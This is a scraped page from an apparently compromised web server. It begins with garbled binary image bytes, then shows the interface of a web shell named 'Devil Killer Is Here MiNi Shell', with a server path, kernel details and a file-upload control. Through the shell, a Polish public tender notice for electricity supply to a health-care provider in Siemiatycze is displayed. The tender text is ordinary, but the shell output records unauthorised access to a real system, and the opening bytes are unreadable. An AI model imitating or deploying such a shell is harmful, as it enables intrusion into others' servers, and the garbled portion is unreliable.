JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20231113/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20231113/0048940801-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> „Kompleksowa dostawa energii elektrycznej, obejmująca sprzedaż i dystrybucję energii elektrycznej dla Samodzielnego Publicznego Zakładu Opieki Zdrowotnej w Siemiatyczach” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Samodzielny Publiczny Zakład Opieki Zdrowotnej w Siemiatyczach</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Samodzielny Publiczny Zakład Opieki Zdrowotnej w Siemiatyczach</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 050653482</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Szpitalna 8</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Siemiatycze</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">17-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podlaskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL842 - Łomżyński</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia.publiczne@spzozsiemiatycze.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://spzozsiemiatycze.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - samodzielny publiczny zakład opieki zdrowotnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Kompleksowa dostawa energii elektrycznej, obejmująca sprzedaż i dystrybucję energii elektrycznej dla Samodzielnego Publicznego Zakładu Opieki Zdrowotnej w Siemiatyczach” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-f93f2708-81f5-11ee-9aa3-96d3b4440790</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00489408</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-11-13</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00008531/08/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.10 „Kompleksowa dostawa energii elektrycznej, obejmująca sprzedaż i dystrybucję energii elektrycznej dla Samodzielnego Publicznego Zakładu Opieki Zdrowotnej w Siemiatyczach”</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-f93f2708-81f5-11ee-9aa3-96d3b4440790 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja pomiędzy Wykonawcą a Zamawiającym w tym składanie ofert odbywa<br/>się przy użyciu platformy http://ezamowienia.gov.pl.<br/>2. Wykonawca, który będzie ubiegał się o niniejsze zamówienie publiczne jest zobowiązany do założenia konta na w/w platformie.<br/>3. Wykonawca dla pełnego korzystania z platformy powinien zweryfikować konto oraz nadać pełne uprawnienia dla<br/>użytkowników/osób uprawnionych po jego stronie do składania ofert.<br/>4. Dalsze szczegóły komunikacji zostały zawarte w rozdziale IV lit. A SWZ.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawca może zwrócić się do<br/>Zamawiającego z wnioskiem o wyjaśnienie treści SWZ. Wniosek można złożyć za pośrednictwem Platformy e-Zamówienia oraz<br/>poczty elektronicznej: zamowienia.publiczne@spzozsiemiatycze.pl<br/>2. Dokumenty elektroniczne, oświadczenia lub elektroniczne kopie dokumentów lub oświadczeń składane są przez Wykonawcę za<br/>pośrednictwem „Formularza do komunikacji” jako załączniki. Zamawiający dopuszcza również możliwość składania dokumentów<br/>elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń za pomocą poczty elektronicznej, na adres<br/>email: zamowienia.publiczne@spzozsiemiatycze.pl (z wyłączeniem składania ofert i załączników do niej).<br/>3. Treść zapytań wraz z wyjaśnieniami Zamawiający udostępnia na stronie internetowej: http://ezamowienia.gov.pl. W przypadku<br/>awarii portalu e-zamowienia.gov.pl wyjaśnienia treści SWZ, zostaną umieszczone bezpośrednio na stornie internetowej<br/>www.spzozsiemiatycze.pl.<br/>4. Dalsze szczegóły komunikacji zostały zawarte w rozdziale IV lit C SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 Rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE<br/>L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>• administratorem Pani/Pana danych osobowych jest Samodzielny Publiczny Zakład Opieki Zdrowotnej w Siemiatyczach, ul.<br/>Szpitalna 8, 17-300 Siemiatycze, tel. 85 655 22 00;<br/>• kontakt do inspektora ochrony danych w Samodzielnym Publicznym Zakładzie Opieki Zdrowotnej w Siemiatyczach; e-mail:<br/>iodo@spzozsiemiatycze.pl;<br/>• dane osobowe takie jak imię, nazwisko, nazwa, adres siedziby/korespondencyjny, telefon, adres mail będą przetwarzane w celu<br/>przeprowadzenia postępowania o udzielenie zamówienia publicznego oraz w celu archiwizacji.<br/>• Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o<br/>udzielenie zamówienia publicznego „Kompleksowa dostawa energii elektrycznej, obejmująca sprzedaż i dystrybucję energii<br/>elektrycznej dla Samodzielnego Publicznego Zakładu Opieki Zdrowotnej w Siemiatyczach” oznaczenie postępowania: SP ZOZ<br/>ZP/11/23, prowadzonym w trybie podstawowym art. 275 pkt 1) ustawy Pzp;<br/>• odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w<br/>oparciu o art. 18 oraz art. 74 ustawy Pzp, w tym pozostali oferenci oraz wszyscy zainteresowani z uwzględnieniem przepisów w<br/>zakresie zamówień publicznych, a także podmioty przetwarzające dane na podstawie zawartych z Zamawiającym umów;<br/>• Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ustawy Pzp, przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas<br/>trwania umowy;<br/>• obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje<br/>niepodania określonych danych wynikają z ustawy Pzp;<br/>• w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22<br/>RODO;<br/>• posiada Pani/Pan:<br/>na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych;<br/> na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO - wystąpienie z żądaniem ograniczenia przetwarzania, nie ogranicza<br/>przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia publicznego ;<br/>prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>• nie przysługuje Pani/Panu:<br/>w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/> na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">SP ZOZ ZP/17/23</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest kompleksowa dostawa energii elektrycznej, obejmująca sprzedaż i usługę dystrybucji energii elektrycznej przez Wykonawcę (Sprzedawcę) na rzecz Zamawiającego (Odbiorcy) do wszystkich punktów poboru (dalej także PPE) określonych w załączniku nr 1, stanowiącym załącznik do SWZ. <br/>2.	Przedmiot zamówienia realizowany będzie na warunkach określonych w ustawie z dnia 10.04.1997r. - Prawo energetyczne (t. j. Dz. U. z 2022 r., poz. 1385 ze zm.) wraz z przepisami wykonawczymi – zwanej dalej Prawem energetycznym.<br/>3.	Szacowane zużycie energii w okresie obowiązywania umowy dla SP ZOZ w Siemiatyczach w okresie 12 m-cy wynosi –729,6 MWh = 729 600 kWh. <br/>4.	Zamawiający przewiduje możliwość skorzystania z prawa opcji, o którym mowa w art. 441 ust. 1 ustawy Pzp, obejmującym możliwość zwiększenia dostaw energii elektrycznej na warunkach umowy o kolejne 20% zamówienia podstawowego w sytuacji kiedy po rozstrzygnięciu postępowania przetargowego utworzone zostaną nowe punkty poboru energii lub w przypadku zwiększenia zapotrzebowania na dostawę energii elektrycznej do PPE wymienionych w Załączniku nr 1 do SWZ - Szacunkowe zapotrzebowanie na energię elektryczną i opis punktów poboru energii elektrycznej.<br/>5.	Prawo opcji jest uprawnieniem Zamawiającego, z którego może, ale nie musi skorzystać w ramach realizacji umowy. W przypadku nie skorzystania przez Zamawiającego z prawa opcji, Wykonawcy nie przysługują żadne roszczenia z tego tytułu poza wynagrodzeniem za zużycie energii elektrycznej według wskazań układów pomiarowo – rozliczeniowych. Warunkiem uruchomienia prawa opcji jest złożenie przez Zamawiającego oświadczenia woli w przedmiocie skorzystania z prawa opcji w określonym przez niego zakresie.<br/>6.	Roczne szacowane zapotrzebowanie w roku kalendarzowym 2024 r. na energię elektryczną ustalono na poziomie 729,6 MWh (z prawem opcji ok. 875,52 MWh).<br/>7.	Wykaz punktów poboru energii wraz z informacjami na temat obowiązujących umów i zużycia energii w podziale na grupy taryfowe znajduje się w załączniku nr 1 do SWZ. <br/>8.	Wykonawca składając ofertę musi wykazać się prawem do dystrybucji energii elektrycznej przy udziale operatora systemu dystrybucyjnego działającym na terenie Zamawiającego.<br/>9.	W ramach realizacji przedmiotu zamówienia, Wykonawca (Sprzedawca) zobowiązany jest zapewnić Zamawiającemu dostęp do informacji o danych pomiarowo-rozliczeniowych pobranej energii elektrycznej i bilansowania handlowego w zakresie sprzedaży energii elektrycznej, a także o składnikach składowych opłat dystrybucyjnych i kalkulacji ceny za dystrybucję energii elektrycznej, a co za tym zobowiązany jest wykonywać raporty w tym przedmiocie na wniosek Zamawiającego. <br/>10.	Sprzedaż energii elektrycznej i świadczenia usług dystrybucji odbywa się na podstawie umowy kompleksowej zawartej z PGE Obrót S.A. zawartej na czas określony – 01.01.2023 r. - 31.12.2023 r.). Zamawiający jeśli będzie to konieczne udzieli Wykonawcy niezbędnych pełnomocnictw do wypowiedzenia dotychczasowych umów sprzedaży i dystrybucji energii elektrycznej.<br/>11.	Prognozowane zużycie energii elektrycznej ma charakter orientacyjny służący do określenia wartości zamówienia i do porównania ofert i nie stanowi ze strony Zamawiającego zobowiązania do zakupu energii w podanej ilości energii. Liczba punktów poboru energii elektrycznej w trakcie realizacji umowy sprzedaży energii elektrycznej może ulec zmianie, zmniejszeniu lub <br/>zwiększeniu. Ostateczne rozliczenie zobowiązań Zamawiającego będzie się odbywało według zużycia wykazywanego przez układy pomiarowo – rozliczeniowe.<br/>12.	Sprzedaż energii elektrycznej dla nowego PPE (w obrębie grup taryfowych, które zostały ujęte w SWZ oraz wycenione w Formularzu Ofertowym Wykonawcy), będzie dokonywana na podstawie zmiany przedmiotowego załącznika bez konieczności renegocjowania warunków Umowy.<br/>13.	Rozliczenie za usługę dystrybucji energii elektrycznej odbywać się będzie na podstawie bieżących wskazań układów pomiarowo-rozliczeniowych wg stawek opłat wynikających ze złożonej oferty oraz Taryfy Operatora Systemu Dystrybucyjnego, Taryfy Sprzedawcy. <br/>14.	Jeśli na 2024 r. zostaną na mocy obowiązujących przepisów prawa wprowadzone ceny maksymalne za sprzedaż lub dystrybucję energii elektrycznej, Zamawiającego z Wykonawcą wiążą ceny maksymalne, chyba że ceny obowiązujące w wyniku zastosowania niniejszego postępowania są niższe niż ceny maksymalne.<br/>15.	Z wybranym Wykonawcą będzie zawarta umowa – wzór stanowi załącznik nr 3 do SWZ.<br/>16.	Zamawiający udzieli wyłonionemu w postępowaniu Wykonawcy pełnomocnictwa do:<br/>a)	powiadomienia właściwego Operatora Systemu Dystrybucyjnego o zawarciu umowy sprzedaży energii elektrycznej oraz o planowanym terminie rozpoczęcia sprzedaży energii elektrycznej,<br/>b)	reprezentowania Zamawiającego przed Operatorem Sieci Dystrybucyjnej w sprawach związanych ze świadczenie usług dystrybucji, w tym dla nowego przyłączenia (brak dotychczasowej umowy),<br/>c)	reprezentowania Zamawiającego w kontaktach z dotychczasowym Sprzedawcą energii elektrycznej lub Operatorem Systemu Dystrybucji w sprawach związanych z procesem zmiany Sprzedawcy, dotyczy punktów zamieszczonych w Załączniku nr 1 do SWZ.<br/>17.	Nazwy i kody dotyczące przedmiotu zamówienia określone we Wspólnym Słowniku Zamówień Publicznych (CPV): <br/>09300000 - 2 – energia elektryczna, cieplna, słoneczna i jądrowa,<br/>09310000 - 5 – elektryczność,<br/>65300000 - 6 – przesyła energii elektrycznej i podobne usługi.<br/>18.	Energia elektryczna musi spełniać parametry techniczne zgodnie z zapisami ustawy Prawo energetyczne z dnia 10 kwietnia 1997 r. – Prawo energetyczne (Dz. U. z 2022 r. poz. 1385 ze zm.) oraz rozporządzeniami wykonawczymi do tej ustawy.<br/>19.	Zamawiający wyraża zgodę na podpisanie umowy sprzedaży energii elektrycznej drogą korespondencyjną.<br/>20.	Zamawiający nie posiada statusu wytwórcy, o którym mowa w art. 2 ust. 39 ustawy z dnia 20 lutego 2015 r. o odnawialnych źródłach energii (t. j. Dz. U. z 2023 r., poz. 1436 ze zm.), co oznacza, że jest podmiotem nie wytwarzającym energię elektryczną lub ciepło z odnawialnych źródeł energii lub nie wytwarza biogaz, biogaz rolniczy, biometan, wodór w instalacjach odnawialnego źródła energii, w stosunku do punktów poboru energii wymienionych przez Zamawiającego w dokumentacji przetargowej.<br/>21.	Zamawiający nie posiada statusu prosumenta energii odnawialnej, o którym mowa w art. 2 pkt 27a) ustawy z dnia 20 lutego 2015 r. o odnawialnych źródłach energii (t. j. Dz. U. z 2023 r., poz. 1436 ze zm.), co oznacza, że nie jest odbiorcą końcowym wytwarzającym energię elektryczną wyłącznie z odnawialnych źródeł energii na własne potrzeby w mikro instalacji, w stosunku do punktów poboru energii wymienionych przez Zamawiającego w dokumentacji przetargowej. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">09300000-2 - Energia elektryczna, cieplna, słoneczna i jądrowa</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">09310000-5 - Elektryczność</p> <p class="mb-0">65300000-6 - Przesył energii elektrycznej i podobne usługi</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający przewiduje możliwość skorzystania z prawa opcji, o którym mowa w art. 441 ust. 1 ustawy Pzp, obejmującym<br/>możliwość zwiększenia dostaw energii elektrycznej na warunkach umowy o kolejne 20% zamówienia podstawowego w<br/>sytuacji kiedy po rozstrzygnięciu postępowania przetargowego utworzone zostaną nowe punkty poboru energii lub w<br/>przypadku zwiększenia zapotrzebowania na dostawę energii elektrycznej do PPE wymienionych w Załączniku nr 1 do SWZ<br/>- Szacunkowe zapotrzebowanie na energię elektryczną i opis punktów poboru energii elektrycznej. <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-01-01 do 2024-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Wykonawca podaje cenę za realizację przedmiotu zamówienia zgodnie ze wzorem Formularza Ofertowego, stanowiącego Załącznik nr 2 do SWZ. W formularzu ofertowym (załącznik nr 2 do SWZ) w lit a) należy wpisać całkowitą cenę brutto za wykonanie całości zamówienia oraz podać cenę jednostkową brutto za 1 MWh. Cenę należy wyliczyć poprzez przemnożenie ceny jednostkowej brutto za 1 MWh i ilości MWh (ilość szacunkowa na 2024 r.) otrzymany iloczyn wraz z dodaną do niego całkowitą ceną za dystrybucję stanowi wartość oferty. W ofercie w wyznaczonym miejscu należy podać także cenę jednostkową brutto za 1 MWh.<br/>2.	Całkowita cena ofertowa brutto musi uwzględniać wszystkie koszty związane z realizacją przedmiotu zamówienia zgodnie z opisem przedmiotu zamówienia oraz istotnymi postanowieniami umowy określonymi w niniejszej SWZ. Cena podana na Formularzu Ofertowym jest ceną ostateczną, niepodlegającą negocjacji i wyczerpującą wszelkie należności Wykonawcy wobec Zamawiającego związane z realizacją przedmiotu zamówienia.<br/>3.	Cena oferty powinna zawierać wszystkie składniki cenowe oraz inne koszty ponoszone przez Wykonawcę celem prawidłowego wykonania zamówienia.<br/>4.	Wartości w ofercie należy podać zaokrąglone do 2 miejsc po przecinku, przy czym końcówki poniżej 0,5 groszy pomniejsza się, a końcówki 0,5 groszy i wyższe zaokrągla się do 1 grosza wzwyż.<br/>5.	Informacje dotyczące walut obcych, w jakich mogą być prowadzone rozliczenia między Zamawiającym a Wykonawcą: Zamawiający rozliczał będzie przedmiot umowy w PLN.<br/>6.	Zamawiający nie przewiduje udzielenia zaliczek na poczet wykonania zamówienia. <br/>7.	Jeżeli Wykonawca złoży ofertę, której wybór będzie prowadził do powstania u Zamawiającego obowiązku podatkowego zgodnie z ustawą o podatku od towarów i usług, na podstawie art. 225 ust. 1 ustawy Pzp, dla celów zastosowania kryterium ceny, Zamawiający doliczy do przedstawionej w tej ofercie ceny kwotę podatku od towarów i usług, którą miałby obowiązek rozliczyć.<br/>8.	Zgodnie z art. 225 ust. 2 ustawy Pzp Wykonawca składając ofertę ma obowiązek:<br/>1)	poinformować Zamawiającego, że wybór jego oferty będzie prowadził do powstania u Zamawiającego obowiązku podatkowego,<br/>2)	wskazania nazwy (rodzaju) towaru lub usługi, których dostawa lub świadczenie będą prowadzić do powstania obowiązku podatkowego<br/>3) wskazania wartości towaru lub usługi objętego obowiązkiem podatkowym Zamawiającego bez kwoty podatku,<br/>4)	wskazania stawki podatku od towarów i usług, która zgodnie z wiedzą Wykonawcy będzie miała zastosowanie.<br/><br/>1.	Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/>Cena (C) – waga kryterium 100%;<br/>2.	Zasady oceny ofert w poszczególnych kryteriach:<br/>Cena (C) – waga 100 %<br/>całkowita cena najniższa brutto*<br/>C = ------------------------------------------- x 100 pkt x 100 %<br/>całkowita cena oferty ocenianej brutto<br/>* spośród wszystkich złożonych ofert niepodlegających odrzuceniu<br/>a)	Podstawą przyznania punktów w kryterium „cena” będzie całkowita cena ofertowa brutto podana przez Wykonawcę w Formularzu Ofertowym.<br/>b)	Całkowita cena ofertowa brutto musi uwzględniać wszelkie koszty jakie Wykonawca poniesie w związku z realizacją przedmiotu zamówienia.<br/>3.	Punktacja przyznawana Wykonawcom w kryterium oceny ofert będzie liczona z dokładnością do dwóch miejsc po przecinku, zgodnie z 